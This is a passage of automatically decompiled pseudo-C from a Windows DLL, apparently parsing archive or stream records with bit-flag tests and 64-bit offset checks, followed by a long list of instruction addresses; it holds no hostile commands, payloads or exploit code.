																										L145:
																										_t394 =  *(_t609 + 0x24);
																										 *(_t609 + 0x24) = _t394 + 4;
																										_t324 = _t609 + 0x11;
																										 *_t324 =  *(_t609 + 0x11) |  *(_t609 + 0x10);
																										__eflags =  *_t324;
																										 *((intOrPtr*)( *(_t606 + 0x50) +  *(_t609 + 0x28) * 4)) =  *_t394;
																									} else {
																										_t404 =  *(_t609 + 0x2c);
																										__eflags = _t404;
																										if(_t404 != 0) {
																											__eflags =  *_t404 & 0x00000080;
																											if(( *_t404 & 0x00000080) != 0) {
																												goto L145;
																											}
																										}
																									}
																									goto L146;
																								}
																							} else {
																								_t405 = E10005A70(_t606, _t566);
																								_t460 = _t533;
																								_t540 =  *( *(_t606 + 0x6c) + _t566 * 4);
																								 *((intOrPtr*)(_t609 + 0x78)) = _t405;
																								_t406 =  *(_t606 + 0x44);
																								_t480 =  *((intOrPtr*)(_t406 + _t540 * 8));
																								_t589 =  *(_t406 + 4 + _t540 * 8);
																								_t407 =  *(_t609 + 0x1c);
																								_t541 =  *(_t609 + 0x20);
																								_t609 = _t609 + 8;
																								_t408 = _t407 - _t480;
																								asm("sbb edx, esi");
																								__eflags = _t460 - _t541;
																								if(__eflags < 0) {
																									goto L158;
																								}
																								_t542 =  *((intOrPtr*)(_t609 + 0x70));
																								if(__eflags <= 0) {
																									__eflags = _t542 - _t408;
																									if(_t542 < _t408) {
																										goto L158;
																									}
																								}
																								_t481 = _t480 + _t542;
																								asm("adc esi, ebx");
																								__eflags = _t589 - _t460;
																								 *((intOrPtr*)(_t609 + 0x14)) = _t481;
																								 *(_t609 + 0x18) = _t589;
																								if(__eflags < 0) {
																									goto L158;
																								}
																								if(__eflags <= 0) {
																									__eflags = _t481 - _t542;
																									if(_t481 < _t542) {
																										goto L158;
																									}
																								}
																								__eflags =  *(_t609 + 0x34) - 1;
																								if( *(_t609 + 0x34) != 1) {
																									L132:
																									_t409 =  *(_t609 + 0x28);
																									goto L133;
																								} else {
																									_t591 =  *(_t606 + 0xc);
																									__eflags = _t591;
																									if(_t591 == 0) {
																										goto L132;
																									} else {
																										_t409 =  *(_t609 + 0x28);
																										_t545 = 0x80 >> (_t409 & 0x00000007);
																										_t489 =  *((intOrPtr*)((_t409 >> 3) + _t591));
																										__eflags = _t489 & _t545;
																										if((_t489 & _t545) == 0) {
																											L133:
																											__eflags =  *((char*)(_t609 + 0x13));
																											if( *((char*)(_t609 + 0x13)) != 0) {
																												L136:
																												_t482 =  *(_t609 + 0x24);
																												 *((intOrPtr*)( *(_t606 + 0x50) + _t409 * 4)) =  *_t482;
																												_t302 = _t609 + 0x11;
																												 *_t302 =  *(_t609 + 0x11) |  *(_t609 + 0x10);
																												__eflags =  *_t302;
																												 *(_t609 + 0x24) = _t482 + 4;
																											} else {
																												_t484 =  *(_t609 + 0x2c);
																												__eflags = _t484;
																												if(_t484 != 0) {
																													__eflags =  *_t484 & 0x00000080;
																													if(( *_t484 & 0x00000080) != 0) {
																														goto L136;
																													}
																												}
																											}
																											 *(_t609 + 0x1c) = _t566 + 1;
																										} else {
																											 *((intOrPtr*)( *(_t606 + 0x50) + _t409 * 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t606 + 0x10)) + _t566 * 4));
																											 *(_t609 + 0x11) =  *(_t609 + 0x11) |  *(_t609 + 0x10);
																											 *(_t609 + 0x1c) = _t566 + 1;
																										}
																									}
																								}
																								goto L146;
																							}
																						} else {
																							_t533 = 0x80 >> (_t586 & 0x00000007);
																							_t412 =  *((intOrPtr*)((_t586 >> 3) + _t459));
																							__eflags = _t412 & _t533;
																							if((_t412 & _t533) != 0) {
																								goto L146;
																							} else {
																								_t566 =  *(_t609 + 0x1c);
																								goto L121;
																							}
																						}
																					} else {
																						 *( *(_t606 + 0x70) + _t586 * 4) = 0xffffffff;
																						goto L146;
																					}
																				}
																			}
																			goto L161;
																			L146:
																			 *(_t609 + 0x10) =  *(_t609 + 0x10) >> 1;
																			_t398 =  *(_t609 + 0x28) + 1;
																			__eflags = _t398 -  *(_t609 + 0x20);
																			 *(_t609 + 0x28) = _t398;
																		} while (_t398 <  *(_t609 + 0x20));
																		__eflags =  *(_t609 + 0x10) - 0x80;
																		if( *(_t609 + 0x10) != 0x80) {
																			_t403 = _t398 + 0xffffffff >> 3;
																			__eflags = _t403;
																			 *((char*)(_t403 +  *(_t606 + 0x48))) =  *(_t609 + 0x12) & 0x000000ff;
																			 *((char*)(_t403 +  *((intOrPtr*)(_t606 + 0x4c)))) =  *(_t609 + 0x11) & 0x000000ff;
																		}
																		goto L149;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								} else {
									L23:
									__eflags = 0;
									return 0;
								}
							} else {
								__eflags =  *(_t607 + 0x18);
								if( *(_t607 + 0x18) != 0) {
									goto L22;
								} else {
									_t599 = _t606 + 0x38;
									_t366 = E10005CE0( *((intOrPtr*)(_t607 + 0xc0)), _t607 + 0x68, _t606, 0x40000000,  *((intOrPtr*)(_t607 + 0xc0)),  *((intOrPtr*)( *((intOrPtr*)(_t607 + 0xc0)))), _t599,  *((intOrPtr*)(_t607 + 0xc4)));
									_t607 = _t607 + 0x18;
									__eflags = _t366;
									if(_t366 != 0) {
										goto L159;
									} else {
										 *_t599 =  *_t599 +  *((intOrPtr*)(_t606 + 0x30));
										asm("adc [esi+0x4], eax");
										_t366 = E100049A0( *(_t607 + 0xb4), _t607 + 0x14);
										__eflags = _t366;
										if(_t366 != 0) {
											goto L159;
										} else {
											_t367 =  *(_t607 + 0x14);
											goto L22;
										}
									}
								}
							}
						} else {
							__eflags =  *(_t607 + 0x18);
							if( *(_t607 + 0x18) != 0) {
								goto L17;
							} else {
								E10004810(_t607 + 0x80);
								_t601 =  *((intOrPtr*)(_t607 + 0xc8));
								_t577 = _t607 + 0x98;
								_t446 = E10005E00(8, _t607 + 0x98,  *((intOrPtr*)(_t607 + 0xc0)), _t454,  *((intOrPtr*)(_t607 + 0xbc)),  *((intOrPtr*)(_t606 + 0x30)),  *((intOrPtr*)(_t606 + 0x34)),  *((intOrPtr*)(_t607 + 0xc8)));
								_t559 =  *((intOrPtr*)(_t607 + 0x9c));
								 *(_t607 + 0x44) = _t446;
								_t447 =  *((intOrPtr*)(_t607 + 0xd8));
								_t607 = _t607 + 0x18;
								 *_t447 = _t559;
								E10004840(_t577, _t601);
								__eflags =  *(_t607 + 0x2c);
								if( *(_t607 + 0x2c) == 0) {
									_t366 = E100049A0(_t454, _t607 + 0x14);
									__eflags = _t366;
									if(_t366 != 0) {
										goto L159;
									} else {
										_t367 =  *(_t607 + 0x14);
										goto L17;
									}
								} else {
									return  *(_t607 + 0x2c);
								}
							}
						}
					} else {
						_t366 = E100049A0(_t560, _t607 + 0x44);
						if(_t366 != 0) {
							goto L159;
						} else {
							while(( *(_t607 + 0x44) |  *(_t607 + 0x48)) != 0) {
								_t366 = E10004B40(_t454);
								if(_t366 != 0) {
									goto L159;
								} else {
									_t453 = E100049A0(_t454, _t607 + 0x44);
									if(_t453 == 0) {
										continue;
									} else {
										return _t453;
									}
								}
								goto L161;
							}
							_t366 = E100049A0(_t454, _t607 + 0x14);
							__eflags = _t366;
							if(_t366 != 0) {
								goto L159;
							} else {
								_t367 =  *(_t607 + 0x14);
								goto L11;
							}
						}
					}
				}
				L161:
			}













































































                                                                                                                                                      0x100060f7
                                                                                                                                                      0x10006101
                                                                                                                                                      0x1000610e
                                                                                                                                                      0x10006110
                                                                                                                                                      0x10006114
                                                                                                                                                      0x10006118
                                                                                                                                                      0x1000611c
                                                                                                                                                      0x10006120
                                                                                                                                                      0x10006124
                                                                                                                                                      0x10006128
                                                                                                                                                      0x1000612c
                                                                                                                                                      0x10006130
                                                                                                                                                      0x10006137
                                                                                                                                                      0x10006b41
                                                                                                                                                      0x10006b41
                                                                                                                                                      0x1000613d
                                                                                                                                                      0x1000613d
                                                                                                                                                      0x10006144
                                                                                                                                                      0x100061aa
                                                                                                                                                      0x100061aa
                                                                                                                                                      0x100061ad
                                                                                                                                                      0x10006245
                                                                                                                                                      0x10006245
                                                                                                                                                      0x10006248
                                                                                                                                                      0x100062b7
                                                                                                                                                      0x100062b7
                                                                                                                                                      0x100062bd
                                                                                                                                                      0x100062bf
                                                                                                                                                      0x100062ce
                                                                                                                                                      0x100062d1
                                                                                                                                                      0x10006b32
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006b32
                                                                                                                                                      0x100062d9
                                                                                                                                                      0x100062db
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100062e1
                                                                                                                                                      0x100062e5
                                                                                                                                                      0x100062e9
                                                                                                                                                      0x100062ed
                                                                                                                                                      0x100062fc
                                                                                                                                                      0x10006301
                                                                                                                                                      0x10006303
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006309
                                                                                                                                                      0x1000630d
                                                                                                                                                      0x1000631a
                                                                                                                                                      0x1000631d
                                                                                                                                                      0x10006322
                                                                                                                                                      0x10006324
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006330
                                                                                                                                                      0x10006330
                                                                                                                                                      0x10006330
                                                                                                                                                      0x10006334
                                                                                                                                                      0x10006338
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006344
                                                                                                                                                      0x10006349
                                                                                                                                                      0x1000634b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006351
                                                                                                                                                      0x10006355
                                                                                                                                                      0x1000635a
                                                                                                                                                      0x1000635c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006362
                                                                                                                                                      0x10006366
                                                                                                                                                      0x10006368
                                                                                                                                                      0x1000636a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000636a
                                                                                                                                                      0x10006370
                                                                                                                                                      0x10006374
                                                                                                                                                      0x100065f1
                                                                                                                                                      0x100065f3
                                                                                                                                                      0x100065f3
                                                                                                                                                      0x100065f5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000637a
                                                                                                                                                      0x1000637a
                                                                                                                                                      0x1000637e
                                                                                                                                                      0x10006384
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000638a
                                                                                                                                                      0x1000638a
                                                                                                                                                      0x1000638d
                                                                                                                                                      0x10006390
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006396
                                                                                                                                                      0x10006396
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100064a0
                                                                                                                                                      0x100064a4
                                                                                                                                                      0x100064a8
                                                                                                                                                      0x100064aa
                                                                                                                                                      0x100064ac
                                                                                                                                                      0x100064b1
                                                                                                                                                      0x100064b3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100064b9
                                                                                                                                                      0x100064b9
                                                                                                                                                      0x100064bd
                                                                                                                                                      0x100064c4
                                                                                                                                                      0x100064c8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100064c8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100064d5
                                                                                                                                                      0x100064d9
                                                                                                                                                      0x100064dd
                                                                                                                                                      0x100064df
                                                                                                                                                      0x100064e4
                                                                                                                                                      0x100064e6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100064ec
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100064ec
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000639d
                                                                                                                                                      0x1000639f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100063a8
                                                                                                                                                      0x100063ab
                                                                                                                                                      0x100063ad
                                                                                                                                                      0x100063af
                                                                                                                                                      0x100063b2
                                                                                                                                                      0x100063b4
                                                                                                                                                      0x100063b8
                                                                                                                                                      0x100063ba
                                                                                                                                                      0x100063d2
                                                                                                                                                      0x100063d7
                                                                                                                                                      0x100063d9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100063df
                                                                                                                                                      0x100063df
                                                                                                                                                      0x100063ea
                                                                                                                                                      0x100063ec
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100063f2
                                                                                                                                                      0x100063f9
                                                                                                                                                      0x10006400
                                                                                                                                                      0x10006407
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006407
                                                                                                                                                      0x100063bc
                                                                                                                                                      0x100063bf
                                                                                                                                                      0x100063c3
                                                                                                                                                      0x1000640b
                                                                                                                                                      0x1000640b
                                                                                                                                                      0x10006410
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000641a
                                                                                                                                                      0x1000642a
                                                                                                                                                      0x1000642b
                                                                                                                                                      0x1000642c
                                                                                                                                                      0x1000642e
                                                                                                                                                      0x10006431
                                                                                                                                                      0x10006433
                                                                                                                                                      0x10006436
                                                                                                                                                      0x10006b45
                                                                                                                                                      0x10006b51
                                                                                                                                                      0x1000643c
                                                                                                                                                      0x1000643c
                                                                                                                                                      0x10006440
                                                                                                                                                      0x10006442
                                                                                                                                                      0x10006448
                                                                                                                                                      0x1000644b
                                                                                                                                                      0x1000644c
                                                                                                                                                      0x1000644e
                                                                                                                                                      0x10006451
                                                                                                                                                      0x10006453
                                                                                                                                                      0x10006456
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000645c
                                                                                                                                                      0x10006463
                                                                                                                                                      0x10006468
                                                                                                                                                      0x1000646c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000646c
                                                                                                                                                      0x10006444
                                                                                                                                                      0x10006444
                                                                                                                                                      0x1000646f
                                                                                                                                                      0x1000647b
                                                                                                                                                      0x10006480
                                                                                                                                                      0x10006482
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006488
                                                                                                                                                      0x10006488
                                                                                                                                                      0x1000648c
                                                                                                                                                      0x10006492
                                                                                                                                                      0x10006496
                                                                                                                                                      0x10006499
                                                                                                                                                      0x10006499
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000648c
                                                                                                                                                      0x10006482
                                                                                                                                                      0x10006442
                                                                                                                                                      0x10006436
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100065da
                                                                                                                                                      0x100065e1
                                                                                                                                                      0x100065e8
                                                                                                                                                      0x100065ea
                                                                                                                                                      0x100065eb
                                                                                                                                                      0x100065ec
                                                                                                                                                      0x100065ec
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100065a4
                                                                                                                                                      0x100065ab
                                                                                                                                                      0x100065b2
                                                                                                                                                      0x100065b4
                                                                                                                                                      0x100065b5
                                                                                                                                                      0x100065b6
                                                                                                                                                      0x100065b6
                                                                                                                                                      0x100065b9
                                                                                                                                                      0x100065b9
                                                                                                                                                      0x100065c0
                                                                                                                                                      0x100065c4
                                                                                                                                                      0x100065c5
                                                                                                                                                      0x100065c6
                                                                                                                                                      0x100065c7
                                                                                                                                                      0x100065c8
                                                                                                                                                      0x100065cd
                                                                                                                                                      0x100065d0
                                                                                                                                                      0x100065d2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100065d8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100065d8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100064f1
                                                                                                                                                      0x100064f8
                                                                                                                                                      0x100064f8
                                                                                                                                                      0x100064fd
                                                                                                                                                      0x10006502
                                                                                                                                                      0x10006508
                                                                                                                                                      0x1000650a
                                                                                                                                                      0x10006512
                                                                                                                                                      0x10006514
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000651a
                                                                                                                                                      0x1000651a
                                                                                                                                                      0x1000651d
                                                                                                                                                      0x1000651f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006528
                                                                                                                                                      0x1000652b
                                                                                                                                                      0x1000652d
                                                                                                                                                      0x1000652f
                                                                                                                                                      0x10006532
                                                                                                                                                      0x10006534
                                                                                                                                                      0x10006536
                                                                                                                                                      0x1000653c
                                                                                                                                                      0x10006543
                                                                                                                                                      0x10006547
                                                                                                                                                      0x1000654c
                                                                                                                                                      0x1000654e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006554
                                                                                                                                                      0x10006554
                                                                                                                                                      0x10006558
                                                                                                                                                      0x1000655f
                                                                                                                                                      0x10006561
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006567
                                                                                                                                                      0x1000656e
                                                                                                                                                      0x10006571
                                                                                                                                                      0x10006575
                                                                                                                                                      0x1000657c
                                                                                                                                                      0x10006580
                                                                                                                                                      0x10006584
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006584
                                                                                                                                                      0x10006538
                                                                                                                                                      0x10006538
                                                                                                                                                      0x10006588
                                                                                                                                                      0x10006588
                                                                                                                                                      0x1000658c
                                                                                                                                                      0x1000658d
                                                                                                                                                      0x1000658e
                                                                                                                                                      0x10006590
                                                                                                                                                      0x10006592
                                                                                                                                                      0x10006597
                                                                                                                                                      0x1000659a
                                                                                                                                                      0x1000659c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100065a2
                                                                                                                                                      0x100065f8
                                                                                                                                                      0x100065fe
                                                                                                                                                      0x10006603
                                                                                                                                                      0x10006605
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006615
                                                                                                                                                      0x10006615
                                                                                                                                                      0x10006615
                                                                                                                                                      0x10006605
                                                                                                                                                      0x1000659c
                                                                                                                                                      0x10006536
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006396
                                                                                                                                                      0x10006390
                                                                                                                                                      0x10006384
                                                                                                                                                      0x10006374
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000634b
                                                                                                                                                      0x1000661e
                                                                                                                                                      0x10006622
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000662e
                                                                                                                                                      0x10006633
                                                                                                                                                      0x10006635
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000663b
                                                                                                                                                      0x10006640
                                                                                                                                                      0x10006644
                                                                                                                                                      0x10006648
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000664c
                                                                                                                                                      0x10006651
                                                                                                                                                      0x10006653
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006659
                                                                                                                                                      0x1000665f
                                                                                                                                                      0x10006664
                                                                                                                                                      0x10006666
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006672
                                                                                                                                                      0x10006672
                                                                                                                                                      0x10006672
                                                                                                                                                      0x10006666
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006653
                                                                                                                                                      0x10006676
                                                                                                                                                      0x1000668a
                                                                                                                                                      0x1000668e
                                                                                                                                                      0x10006692
                                                                                                                                                      0x10006696
                                                                                                                                                      0x1000669a
                                                                                                                                                      0x1000669e
                                                                                                                                                      0x100066a2
                                                                                                                                                      0x100066a6
                                                                                                                                                      0x100066aa
                                                                                                                                                      0x100066af
                                                                                                                                                      0x100066b4
                                                                                                                                                      0x100066b9
                                                                                                                                                      0x100066be
                                                                                                                                                      0x100066c0
                                                                                                                                                      0x100066c3
                                                                                                                                                      0x100066c5
                                                                                                                                                      0x100066c8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100066ce
                                                                                                                                                      0x100066ce
                                                                                                                                                      0x100066d1
                                                                                                                                                      0x100066d3
                                                                                                                                                      0x100066e5
                                                                                                                                                      0x100066e7
                                                                                                                                                      0x100066ea
                                                                                                                                                      0x100066ec
                                                                                                                                                      0x100066ef
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100066d5
                                                                                                                                                      0x100066d5
                                                                                                                                                      0x100066f5
                                                                                                                                                      0x10006703
                                                                                                                                                      0x10006705
                                                                                                                                                      0x10006708
                                                                                                                                                      0x1000670a
                                                                                                                                                      0x1000670d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006713
                                                                                                                                                      0x10006719
                                                                                                                                                      0x10006719
                                                                                                                                                      0x1000671c
                                                                                                                                                      0x10006727
                                                                                                                                                      0x10006729
                                                                                                                                                      0x1000672c
                                                                                                                                                      0x1000672e
                                                                                                                                                      0x10006731
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000671e
                                                                                                                                                      0x1000671e
                                                                                                                                                      0x10006737
                                                                                                                                                      0x1000673d
                                                                                                                                                      0x10006742
                                                                                                                                                      0x10006744
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000674a
                                                                                                                                                      0x1000674a
                                                                                                                                                      0x1000674e
                                                                                                                                                      0x10006750
                                                                                                                                                      0x10006754
                                                                                                                                                      0x10006756
                                                                                                                                                      0x1000675b
                                                                                                                                                      0x1000675e
                                                                                                                                                      0x10006760
                                                                                                                                                      0x10006764
                                                                                                                                                      0x10006768
                                                                                                                                                      0x1000677a
                                                                                                                                                      0x1000677a
                                                                                                                                                      0x1000677c
                                                                                                                                                      0x10006780
                                                                                                                                                      0x1000676a
                                                                                                                                                      0x1000676a
                                                                                                                                                      0x1000676a
                                                                                                                                                      0x10006768
                                                                                                                                                      0x10006784
                                                                                                                                                      0x10006789
                                                                                                                                                      0x10006791
                                                                                                                                                      0x10006ab9
                                                                                                                                                      0x10006ab9
                                                                                                                                                      0x10006abe
                                                                                                                                                      0x10006ac5
                                                                                                                                                      0x10006ac9
                                                                                                                                                      0x10006ad0
                                                                                                                                                      0x10006ad4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006ad6
                                                                                                                                                      0x10006add
                                                                                                                                                      0x10006ae0
                                                                                                                                                      0x10006ae3
                                                                                                                                                      0x10006b1c
                                                                                                                                                      0x10006b1c
                                                                                                                                                      0x10006b21
                                                                                                                                                      0x10006b27
                                                                                                                                                      0x10006b2c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006b2c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006ae5
                                                                                                                                                      0x10006ae5
                                                                                                                                                      0x10006ae7
                                                                                                                                                      0x10006af0
                                                                                                                                                      0x10006af0
                                                                                                                                                      0x10006af5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006aff
                                                                                                                                                      0x10006b04
                                                                                                                                                      0x10006b06
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006b08
                                                                                                                                                      0x10006b08
                                                                                                                                                      0x10006b0c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006b11
                                                                                                                                                      0x10006b14
                                                                                                                                                      0x10006b17
                                                                                                                                                      0x10006b1a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006b1a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006b06
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006af0
                                                                                                                                                      0x10006797
                                                                                                                                                      0x100067a0
                                                                                                                                                      0x100067a0
                                                                                                                                                      0x100067a5
                                                                                                                                                      0x100067a9
                                                                                                                                                      0x100067b8
                                                                                                                                                      0x100067b8
                                                                                                                                                      0x100067bb
                                                                                                                                                      0x100067c6
                                                                                                                                                      0x100067c9
                                                                                                                                                      0x100067ce
                                                                                                                                                      0x100067d3
                                                                                                                                                      0x100067d3
                                                                                                                                                      0x100067d8
                                                                                                                                                      0x100067e3
                                                                                                                                                      0x100067e7
                                                                                                                                                      0x100067e9
                                                                                                                                                      0x100067ec
                                                                                                                                                      0x100067f0
                                                                                                                                                      0x100067f3
                                                                                                                                                      0x100067fa
                                                                                                                                                      0x1000686b
                                                                                                                                                      0x1000686b
                                                                                                                                                      0x10006870
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006872
                                                                                                                                                      0x10006872
                                                                                                                                                      0x10006876
                                                                                                                                                      0x10006876
                                                                                                                                                      0x10006879
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000687f
                                                                                                                                                      0x10006884
                                                                                                                                                      0x10006887
                                                                                                                                                      0x1000688a
                                                                                                                                                      0x10006892
                                                                                                                                                      0x100068ad
                                                                                                                                                      0x100068ad
                                                                                                                                                      0x100068b1
                                                                                                                                                      0x100068b3
                                                                                                                                                      0x100068b7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100068b9
                                                                                                                                                      0x100068bb
                                                                                                                                                      0x100068c0
                                                                                                                                                      0x100068c4
                                                                                                                                                      0x100068c7
                                                                                                                                                      0x100068cb
                                                                                                                                                      0x100068cd
                                                                                                                                                      0x100068cf
                                                                                                                                                      0x100068d3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100068d9
                                                                                                                                                      0x100068db
                                                                                                                                                      0x100068df
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100068df
                                                                                                                                                      0x100068e5
                                                                                                                                                      0x100068e8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100068e8
                                                                                                                                                      0x10006894
                                                                                                                                                      0x1000689c
                                                                                                                                                      0x100068a1
                                                                                                                                                      0x100068a3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100068a9
                                                                                                                                                      0x100068a9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100068a9
                                                                                                                                                      0x100068a3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006892
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006876
                                                                                                                                                      0x100067fc
                                                                                                                                                      0x10006806
                                                                                                                                                      0x1000680d
                                                                                                                                                      0x10006810
                                                                                                                                                      0x10006812
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006814
                                                                                                                                                      0x10006814
                                                                                                                                                      0x10006818
                                                                                                                                                      0x1000681a
                                                                                                                                                      0x1000684d
                                                                                                                                                      0x1000684d
                                                                                                                                                      0x1000684d
                                                                                                                                                      0x1000681c
                                                                                                                                                      0x1000681c
                                                                                                                                                      0x1000682a
                                                                                                                                                      0x10006831
                                                                                                                                                      0x10006834
                                                                                                                                                      0x10006836
                                                                                                                                                      0x10006838
                                                                                                                                                      0x1000683c
                                                                                                                                                      0x1000683c
                                                                                                                                                      0x1000683c
                                                                                                                                                      0x1000683c
                                                                                                                                                      0x10006843
                                                                                                                                                      0x10006843
                                                                                                                                                      0x10006851
                                                                                                                                                      0x10006856
                                                                                                                                                      0x100068ee
                                                                                                                                                      0x100068ee
                                                                                                                                                      0x100068f2
                                                                                                                                                      0x100068f2
                                                                                                                                                      0x100068f7
                                                                                                                                                      0x100068fa
                                                                                                                                                      0x1000691a
                                                                                                                                                      0x1000691a
                                                                                                                                                      0x1000691a
                                                                                                                                                      0x1000691a
                                                                                                                                                      0x1000691f
                                                                                                                                                      0x10006a13
                                                                                                                                                      0x10006a18
                                                                                                                                                      0x10006a1a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006a20
                                                                                                                                                      0x10006a20
                                                                                                                                                      0x10006a24
                                                                                                                                                      0x10006a2c
                                                                                                                                                      0x10006a30
                                                                                                                                                      0x10006a32
                                                                                                                                                      0x10006a34
                                                                                                                                                      0x10006a38
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006a3e
                                                                                                                                                      0x10006a40
                                                                                                                                                      0x10006a44
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006a44
                                                                                                                                                      0x10006a4a
                                                                                                                                                      0x10006a4f
                                                                                                                                                      0x10006a5e
                                                                                                                                                      0x10006a5e
                                                                                                                                                      0x10006a6e
                                                                                                                                                      0x10006a76
                                                                                                                                                      0x10006a76
                                                                                                                                                      0x10006a76
                                                                                                                                                      0x10006a7a
                                                                                                                                                      0x10006a51
                                                                                                                                                      0x10006a51
                                                                                                                                                      0x10006a55
                                                                                                                                                      0x10006a57
                                                                                                                                                      0x10006a59
                                                                                                                                                      0x10006a5c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006a5c
                                                                                                                                                      0x10006a57
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006a4f
                                                                                                                                                      0x10006925
                                                                                                                                                      0x10006927
                                                                                                                                                      0x1000692f
                                                                                                                                                      0x10006931
                                                                                                                                                      0x10006934
                                                                                                                                                      0x10006938
                                                                                                                                                      0x1000693b
                                                                                                                                                      0x1000693e
                                                                                                                                                      0x10006942
                                                                                                                                                      0x10006946
                                                                                                                                                      0x1000694a
                                                                                                                                                      0x1000694d
                                                                                                                                                      0x1000694f
                                                                                                                                                      0x10006951
                                                                                                                                                      0x10006953
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006959
                                                                                                                                                      0x1000695d
                                                                                                                                                      0x1000695f
                                                                                                                                                      0x10006961
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006961
                                                                                                                                                      0x10006967
                                                                                                                                                      0x10006969
                                                                                                                                                      0x1000696b
                                                                                                                                                      0x1000696d
                                                                                                                                                      0x10006971
                                                                                                                                                      0x10006975
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000697b
                                                                                                                                                      0x1000697d
                                                                                                                                                      0x1000697f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
